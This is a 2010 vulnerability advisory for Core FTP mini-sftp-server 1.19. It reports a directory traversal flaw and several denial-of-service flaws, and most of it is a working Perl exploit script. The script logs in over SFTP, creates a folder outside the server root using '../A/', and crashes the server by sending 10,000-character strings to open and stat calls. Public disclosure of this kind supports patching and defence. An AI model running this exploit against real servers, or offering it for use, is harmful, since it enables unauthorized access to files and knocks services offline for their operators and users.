Date of Discovery: 7-Jun-2010 Credits: leinakesi[at]gmail.com Vendor: Core FTP mini-sftp-server http://www.coreftp.com/server/index.html Affected: Core FTP mini-sftp-server version 1.19. Earlier versions may also be affected. Overview: "Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does--They have the same vulnerabilities. 1. Directory Traversal vulnerability: $m = $sftp->mkdir("../A/");# create a folder outside the root directory 2. Denial of Service vulnerability: $o1 = $sftp->open("A" x 10000); $o2 = $sftp->open("test", "O_RDWR", "A" x 10000); $o3 = $sftp->open("test", $FUZZ, 0666); $o3 = $sftp->open("test", $FUZZ, 0666); $st = $sftp->stat("A" x 10000); PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^ Exploit example: #!/usr/bin/perl #leinakesi[at]gmail.com #thanks to Jeremy Brown, I learned a lot from his blog.^_^ #the script will first make a folder "A" outside the root directory and then crash the server. use Net::SSH2; use Getopt::Std; $FUZZ = "A" x 10000; getopts('S:P:u:p:', \%opts); $server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'}; if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) ) { print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n"; print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n"; exit(0); } $ssh2 = Net::SSH2->new(); $ssh2->connect($server, $port) || die "can not connect the server, please check.\n"; $ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n"; $sftp = $ssh2->sftp(); #make a folder outside the root directory $m = $sftp->mkdir("../A/"); #any command of the following would cause Core FTP mini-sftp-server crash. $o1 = $sftp->open($FUZZ); #$o2 = $sftp->open("test", "O_RDWR", $FUZZ); #$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666); #$st = $sftp->stat($FUZZ); $ssh2->disconnect();